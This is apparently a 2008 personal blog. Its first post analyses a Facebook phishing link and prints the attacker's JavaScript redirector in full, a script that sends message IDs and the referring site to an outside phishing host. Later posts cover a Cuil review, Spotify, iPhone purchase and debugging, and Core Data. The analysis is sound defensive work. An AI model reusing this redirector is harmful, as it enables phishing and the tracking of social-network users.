Erik Turnquist

I was peacefully watching videos on Hulu when I received a mysterious email from one of my friends on Facebook. The message contents contained something that the individual would probably never say to me and was followed by a link. I immediately knew that this might be a part of some phishing scam. Knowing that others who were also sent the message might not realize the danger, I immediately told everyone not to click the link.

Now that the chance of others being taken advantage by this scam was greatly reduced, I could begin my investigation as to what sort of information the phishers were gathering. I fired up a terminal and went to work.

$ curl http://198.64.140.97/funnymovie/

nzmkuewnjpew hvsigccd
<script src="3jsum37jmq1z.js"></script>
uvqztdlft egjykgmuvrrzzmr

Well that seemed odd. I didn’t understand the random characters, but the script tag made it completely obvious that they were up to no good. Well, lets see what it does.
$ curl http://198.64.140.97/funnymovie/3jsum37jmq1z.js

// KROTEG
var abc1 = 'http://r-d-cgpay-090709.com/go/';    // 1
var abc2 = 'http://r-d-cgpay-090709.com/go/';
var ss = '' + location.search; // 2
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com',  abc+'fb.php'],
['tagged.com',    abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com',   abc+'ms.php'],
['msplinks.com',  abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com',     abc+'fu.php'],
['twitter.com',   abc+'tw.php'],
['hi5.com',       abc+'hi5.php'],
['bebo.com',      abc+'be.php']
]; // 3
var s = '' + document.referrer, r = false;
for (var i = 0; i < redirects.length; i ++) {
if ((s.indexOf(redirects[i][0]) != -1)) { // 4
     var redir=redirects[i][1] + location.search;
     if ((location.search).length>0) redir=redir+'&amp;amp;amp;amp;amp;domain='+location.host; else redir=redir+'?domain='+location.host;
     location.href = redir;  //5
     r = true;
     break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;

This find was definitely interesting. Let’s go step by step and figure out what they are doing.

First I wanted to know about the site behind all of this http://r-d-cgpay-090709.com. Their IP address and approximate location could be determined by a simple traceroute.

$ traceroute r-d-cgpay-090709.com

traceroute to r-d-cgpay-090709.com (61.235.117.71), 64 hops max, 40 byte packets
 1  192.168.1.1 (192.168.1.1)  9.331 ms  1.834 ms  2.213 ms
 2  * * *
 3  te-3-4-ur04.santaclara.ca.sfba.comcast.net (68.85.190.253)  11.358 ms  24.434 ms  16.903 ms
 4  be-70-ar01.oakland.ca.sfba.comcast.net (68.85.154.149)  28.483 ms  35.249 ms  16.347 ms
 5  pos-0-6-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.91.225)  22.579 ms  17.279 ms  14.378 ms
 6  pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.181)  20.288 ms  30.457 ms  27.989 ms
 7  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.54)  23.593 ms  21.716 ms  20.496 ms
 8  tenge13-3.br02.sjo01.pccwbtn.net (63.218.179.25)  23.699 ms  19.488 ms  28.077 ms
 9  china-tietong.pos6-2.cr02.hkg04.pccwbtn.net (63.218.252.10)  414.604 ms  395.548 ms  397.325 ms
10  61.237.119.81 (61.237.119.81)  463.588 ms  414.780 ms  397.284 ms
11  61.237.112.74 (61.237.112.74)  399.872 ms * *
12  222.50.127.218 (222.50.127.218)  434.857 ms  415.261 ms  407.054 ms
13  61.235.116.130 (61.235.116.130)  402.744 ms  424.623 ms  408.174 ms
14  61.235.117.71 (61.235.117.71)  409.368 ms  391.156 ms  397.808 ms

It appeared as if this IP address was from somewhere in China according to the line containing “china-tietong”. I was then curious if they had a pattern of dubious behavior. I entered their IP address into Google. According to the search results, McAfee identifies this IP as malicious as it has been responsible for malware in the past. Now that I knew who I was dealing with, it was time to figure out what type of information they were getting from people. I will talk about lines that I have commented in the code.

1. This is the URL that they are using to capture the incoming information.
2. In Javascript, location.search is the string from the URL query section (everything after and including the ?). So in the case of Facebook, it would appear to be something like this: ?t=XXXXXXXXXXXXX&mbox_pos=Y (where X is the message ID).
3. This part of the code creates a url in the form of http://r-d-cgpay-090709.com/go/fb.php where the final page differs by each service the user originates from.
4. The for loop in this part searches through the redirect array for the corresponding originating site. Once it has found the site it creates a url in the form: http://r-d-cgpay-090709.com/go/fb.php?t=XXXXXXXXXXXXX&mbox_pos=Y&domain=facebook.com
5. The browser is sent to this url so that the attackers can gain information about the user that clicked on the link. The site does not send a reply back when visiting this url.

However, this information they are collecting does not seem very interesting. They were able to obtain the message that the url was posted on along with the originating site. Maybe it could be a stepping stone for a larger attack? Could they be gathering information about which social network sites are most vulnerable to a phishing attack? Did I simply miss something? Any insightful comments on this potential attack are welcomed!

I just got back from Diggnation live in San Jose at the Center for Performing Arts. It was hosted by Nvidia during their NVISION 2008 Conference. Enjoy the photos!

Before it started

Prager welcoming everyone

Start the show!

Diggnation!

I recently discovered a bunch of awesome Quicksilver themes developed by Julius Eckert and thought I should share them. I have been using “Showcase” because it provides a very clean interface, is visually striking, and uses Core Animation. Take a Look!

Cuil is a new search engine that went live today. Its goal is to provide more search results with greater accuracy than existing search engines such as Google. Currently it indexes over 120 billion web pages, which is substantially lower than Google’s claim of 1 Trillion unique web pages. Cuil was founded by former Google employees Anna Patterson, Russel Power, Louis Monier, and former IBM employee Tom Costello.

Cuil has some positive qualities, but currently it is not polished enough to replace my preferred search engine, Google.

Pros

• UI: I tend to like darker screen user interfaces than most people, so I especially liked the contrasting black, dark, blue, and white elements. Actually, it fits nicely with the theme of my blog. Overall, the look and feel seems uncluttered, which is largely due to the multi-column view search results. This seems to prevents excessive scrolling when browsing the results.
• Search Categories: When searching for “Seattle”, it divided the search into suggestions that were common for this search. Results included “Seattle Culture”, “Landmarks in Seattle”, etc. Below each category were listed search terms that fit into these categories.

Cons

• Search Results: Several searches that I often do, returned results that were not useful to me. Typing in my own name, “Erik Turnquist”, did not return my website, nor ericturnquist.com which always occurs when searching google. When searching for “Soccer wiki”, “Digg wiki”, “California wiki”, or even “California wikipedia”, did not return a single search result that had Wikipedia. This is highly personal, but searches I do often proved to return useless results. 
• Load Times: Page load times were far too long. Using Webkit r35417, searching for “Apple” took 8.20 seconds, compared to Google’s 355 milliseconds.

Although Cuil is currently having scaling and relevancy issues, I assume that many of those problems will be worked out over time. Conclusion: stick with Google.

The last thing you expect while crossing the street.

I couldn’t find this mentioned on the web anywhere, but it might be useful if your iPhone is always crashing.

1. Download and install the iPhone Configuration Utility
2. Plug your iPhone into your computer.
3. Launch the iPhone Configuration Utility located under /Applications/Utilities/iPhone Configuration Utility
4. Click on the name of your iPhone under “Connected Devices”
5. Open the “Console” tab
6. Debug away!

I finally did it. I got an iPhone. I have been interested in purchasing one for some time, but still had about a year left in my T-Mobile contract. Using the advice from Consumerist, I was able to cancel my contract early because they were going to raise text messaging rates.

It took me two days to actually get the phone. Actually, it’s a funny story.

Day One

On Monday, I went to the Valley Fair Apple Store. When I arrived at 7:31pm I was told that the line had been capped and they would not be able to let me stand in line. I told them that I had taken the bus there, could not get off of work any earlier, and I was wearing an Apple t-shirt (thankfully). After some convincing, I was finally let into the line.

Then, my three hour wait began. At around 10:30pm, a group of six people and I were let into the Apple Store. At 10:35pm I was told, “Sorry, the AT&T servers have just shut down.” My response, “WHAT!?” Apparently, all of AT&T’s activation servers were unresponsive nationwide. Awesome. Thankfully, I was given a card that stated I had 24 hours to claim my iPhone with the guarantee that I would not have to stand in line again.

Day Two

I arrived at the Apple Store at about 9:10pm waited about 10 minutes for someone to actually be available to help me (the employees looked really drained by this point). Finally, I was handed by 8GB black iPhone and within 10 minutes my activation was complete.

As far as I could see.

We have all heard of web streaming music services such as last.fm and Pandora, but I recently had the opportunity to use a desktop streaming music software called Spotify and was amazed.

Spotify, the company, was founded by entrepreneurs Daniel Ek and Martin Lorentzon and has its headquarters in Luxembourg. Spotify, the software, has been in beta for a little over a year, and gone through a number of revisions in the process. Currently, it offers an iTunes like interface for both playing music and searching through their extensive collection of songs. Songs are organized into playlists simply by dragging them from the Spotify music library. Playing a song is as simple as double clicking on it. Finding a song involves typing the title, artist, etc. into the search bar and then browsing through the search results.

Several areas of the product I especially enjoyed were:

Buffer Time

While using Spotify there was none. None while playing songs that had been streamed previously. None while playing obscure Seattle bands. It was incredible. Even my local music library takes longer to start playing songs when the hard drive has to spin up. I continued to test this with as many songs as I could and was not able to make it pause before a song started playing.

Overall Speed

Spotify offers clients for Windows and Mac OS X (could not find information about Linux). Everything in the interface was responsive. Search results were returned incredibly fast. Spotify felt solid and lightweight while being feature rich.

Library Size

The Spotify library had all of the popular music that I expected it to have, but it also included artists which many main stream stores have difficulty supplying content from.

Although I had the experience of playing with the Spotify beta, there were no ads in the version I was using. In the future, and for the final release ads will be added to the product, but they will be done in a non-instrusive manner outline here.

Although I am not a part of the beta, I was able to get a glimpse at software that I believe could change the streaming music market and possibly change the way I listen to music. While online, being able to play any song you want to, anytime, at no cost is extremely hard to resist.

Special thanks to Erik Hammar for showing me this software.

So, I realized I never officially announced this, but this summer I am working at Apple as an intern in the Development Technologies group. Specifically, I will be working on Core Data with a small team of engineers.

Core Data allows Cocoa developers to create sophisticated data models which are automatically stored in XML, Binary, SQLite, or their own database formats. Through the use of Xcode’s Data Model Design tool developers can graphically specify entities, their attributes as well as their relationships to other entities. During runtime these objects are represented through NSManagedObjectModel objects. Data is saved, loaded, and fetched through the NSManagedObjectContext object, which serves as the front end controller for the database. Data can be distributed across multiple database and multiple NSMangedObjectContext objects can interact with a single database.

For useful tutorials on CoreData, take a look at:

• Core Data Class Overview
• Tutorial:Build a Core Data App
• More advanced:Low-Level Core Data Tutorial
• For developing your own atomic store:Atomic Store Programming